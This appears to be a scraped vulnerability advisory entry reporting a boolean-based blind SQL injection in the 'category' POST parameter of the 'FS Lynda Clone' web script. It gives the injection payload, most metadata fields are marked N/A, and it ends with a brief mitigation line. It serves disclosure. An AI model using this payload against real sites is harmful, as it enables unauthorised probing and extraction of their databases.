vendor:
Lynda Clone
by:
8bitsec
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Lynda Clone
Affected Version From: 23 October 17
Affected Version To: 23 October 17
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Lynda Clone – SQL Injection
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/tutorial/ Parameter: category (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=5 AND 1845=1845&keywords=xxxxx
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.